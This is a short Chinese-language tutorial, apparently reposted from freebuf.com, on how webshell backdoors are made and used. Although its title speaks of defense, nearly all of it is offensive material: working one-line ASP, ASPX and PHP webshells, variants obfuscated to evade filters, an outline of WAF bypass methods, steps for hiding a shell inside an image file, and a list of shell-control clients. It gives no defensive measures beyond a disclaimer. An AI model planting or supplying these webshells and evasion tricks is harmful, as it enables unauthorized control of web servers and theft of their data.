脚本木马的防御 – 作者:minggege

脚本木马的制作原理

webshell就是一种网页后门(web后门)

webshell制作原理
webshell使用技巧
webshell"黑吃黑"

一. webshell制作原理

一句话木马(2010年出来)--> 上传大马进行提权
小马               --> 上传大马进行提权
大马
打包马
脱裤马
执行命令马

GetShell就是拿webshell的动作

1. 一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

asp : 
<% execute request("value") %>
<%eval request ("pass")%>
--------------------------------------
sms2056.com/x.asp?value="cmd"
aspx : 
<%@ Page Language="Jscript"%>
<%eval(Request.I tem["pass"]," uns afe");%>
PHP : 
<?php @eval($_POST['attack']) ?>

2. 工作原理

黑客在注册信息的电子邮箱或个人主页等中插入类似如下代码:

<%eval request ("pass")%>

其中pass是值,所以你可以更改自己的值,前面的request就是获取这个值

上述代码现在比较多见,而且字符数少,对表单字数有限制的地方特别的实用

当知道了数据库的URL,就可以利用本地一张网页进行连接得到WebShell(不知道数据库也可以,只要知道一句话木马的文件被插入到那一个ASP文件里面就可以了)

一句话木马是基于B/S结构的

3. 一句话木马变形

<?php $_GET['a']($_POST['b']) ?>
---------------------------------------
x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%>
---------------------------------------
aspcms2.0以上会检查脚本中的双引号""",单引号"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>

<% a=%request("gold") %><%eval %a%>

4. 一般WAF绕过方式

函数绕过
编码绕过
可变变量绕过
动态获取参数绕过

5. 一句话图片马的制作

C32下做一句话
打开c32, 把图片放里面,写入一句话保存,退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性 -> 详细信息 -> 版权内插入一句话即可

6. 常见的一句话客户端

中国菜刀
中国砍刀
蚁剑
C刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
一句话客户端增强版

7. 大马

大马体积比较大,一般50kb以上.功能也多,一般都包含提权命令,磁盘管理,数据库连接接口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能.这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序 .

用途 : 
提权
打包
脱裤
增删文件

8. 小马

作用主要用户上传大马

二. webshell使用技巧

内容编码
配合解析漏洞
配合文件包含
利用文件名溢出

三. webshell”黑吃黑”

http://xss.fbisb.com/xss.php?do=login

1. 找shell后门

查找后门
查找webshell后门
找到后门地址
反搞wehshell箱子

2. 找一句话客户端后门

查找客户端后门
找到后门地址
反搞wehshell箱子

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

来源:freebuf.com 2020-09-15 21:02:00 by: minggege

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论